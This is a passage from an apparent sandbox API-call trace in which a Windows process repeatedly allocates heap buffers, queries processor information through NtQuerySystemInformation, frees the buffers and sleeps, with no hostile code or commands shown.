lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0278.875] Sleep (dwMilliseconds=0x110) [0278.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0278.896] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0278.897] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0278.897] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0278.897] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0278.897] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.898] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0278.898] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0278.898] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0278.898] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0278.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0278.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0278.904] Sleep (dwMilliseconds=0x110) [0278.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0278.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0278.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0278.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0278.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0278.927] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0278.928] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0278.928] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0278.929] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0278.929] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0278.930] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0278.930] Sleep (dwMilliseconds=0x110) [0278.994] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0278.994] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.997] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0279.010] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0279.010] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.011] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0279.011] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0279.011] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.012] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0279.012] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0279.012] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0279.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.013] Sleep (dwMilliseconds=0x110) [0279.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0279.036] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0279.037] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0279.037] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.038] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0279.038] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0279.038] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.039] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0279.039] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0279.039] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.055] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0279.055] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.056] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.056] Sleep (dwMilliseconds=0x110) [0279.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0279.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0279.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0279.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0279.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0279.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0279.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0279.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0279.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.069] Sleep (dwMilliseconds=0x110) [0279.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0279.130] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0279.131] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0279.131] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0279.131] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0279.131] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.132] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0279.132] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0279.132] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.132] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0279.136] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.137] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.137] Sleep (dwMilliseconds=0x110) [0279.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0279.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0279.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0279.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0279.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0279.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0279.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0279.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0279.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.208] Sleep (dwMilliseconds=0x110) [0279.339] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0279.339] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.340] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0279.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0279.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0279.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0279.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0279.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0279.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0279.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.348] Sleep (dwMilliseconds=0x110) [0279.370] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0279.370] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.371] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0279.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0279.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0279.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0279.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0279.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0279.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0279.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.378] Sleep (dwMilliseconds=0x110) [0279.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0279.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0279.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0279.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0279.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0279.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0279.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0279.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0279.396] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.396] Sleep (dwMilliseconds=0x110) [0279.415] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0279.416] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.416] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0279.416] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0279.416] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.417] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0279.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0279.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0279.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0279.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0279.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.425] Sleep (dwMilliseconds=0x110) [0279.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0279.434] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0279.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0279.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0279.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0279.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0279.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0279.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0279.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.441] Sleep (dwMilliseconds=0x110) [0279.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0279.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0279.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0279.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0279.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0279.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0279.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0279.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0279.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.470] Sleep (dwMilliseconds=0x110) [0279.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0279.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0279.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0279.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0279.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0279.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0279.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0279.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0279.484] 